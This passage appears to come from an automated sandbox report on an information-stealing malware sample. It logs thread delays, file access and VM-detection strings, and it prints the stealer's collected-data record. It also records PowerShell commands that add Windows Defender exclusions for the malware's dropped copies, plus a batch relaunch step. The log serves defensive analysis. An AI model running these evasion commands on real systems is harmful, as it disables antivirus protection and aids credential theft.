                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 594125
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 593187
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 592839
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 592484
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 591969
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 591625
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 591281
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 590984
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 590641
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 590078
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 589594
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 589062
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 588547
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 588109
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 587719
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 587440
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 587025
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 586641
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 586250
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 585797
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 585295
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 585078
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 584734
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 584417
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 584147
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 583812
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 583644
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 583453
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 583287
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 583125
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 582960
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 582812
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 582578
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 582347
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 582179
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 582031
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 581859
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 581703
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 581531
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 581359
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 581187
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 581044
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 580880
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 580703
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 580516
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 580347
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 580141
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 579994
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 579883
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 579766
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 579656
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 579546
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 579425
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 579285
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 579156
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 579046
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 578937
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 578817
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 578672
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 578217
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 578037
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 577909
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 577753
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 577625
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 577514
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 577405
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 577281
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 577166
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 577062
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 576953
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 576843
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 576734
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 576593
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 576483
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 576375
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: zZ1Y43bxxV.exe, 00000000.00000002.1757822050.000000001BC57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3030189423.000000001B6BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllfW
                          Source: zZ1Y43bxxV.exe, 00000000.00000002.1757822050.000000001BC57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\S
                          Source: svchost.exe, 00000013.00000002.2902306715.000001F80EE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2904040411.000001F81425A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Adds a directory exclusion to Windows Defender
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe'
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\mozilla maintenance service\logs\StartMenuExperienceHost.exe'
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\UserOOBEBroker.exe'
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\wnWNWNYIxJtFiUSDRXunzX.exe'
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe'
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\mozilla maintenance service\logs\StartMenuExperienceHost.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\UserOOBEBroker.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\wnWNWNYIxJtFiUSDRXunzX.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\mozilla maintenance service\logs\StartMenuExperienceHost.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\UserOOBEBroker.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\wnWNWNYIxJtFiUSDRXunzX.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\QgDfm1tal9.bat" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe "C:\Program Files (x86)\windows sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe"
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.00000000033A9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002EFA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.00000000033A9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002EFA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Crypto Wallets (fff5)":"N","Crypto Extensions (fff5)":"N","Crypto Clients (fff5)":"N","Cookies Count (1671)":"550","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"206","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Domains (e9db)":"","Passwords Domains (e9db)":""},"5.0.4",5,1,"","user","358075","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\windows sidebar\\Gadgets","2DMTP (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States","New York / New York","40.7123 / -74.0068"]
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.00000000033A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: sidebar\\Gadgets","2DMTP (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States","New York / New York","40.7123 / -74.0068"]P_
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeQueries volume information: C:\Users\user\Desktop\zZ1Y43bxxV.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
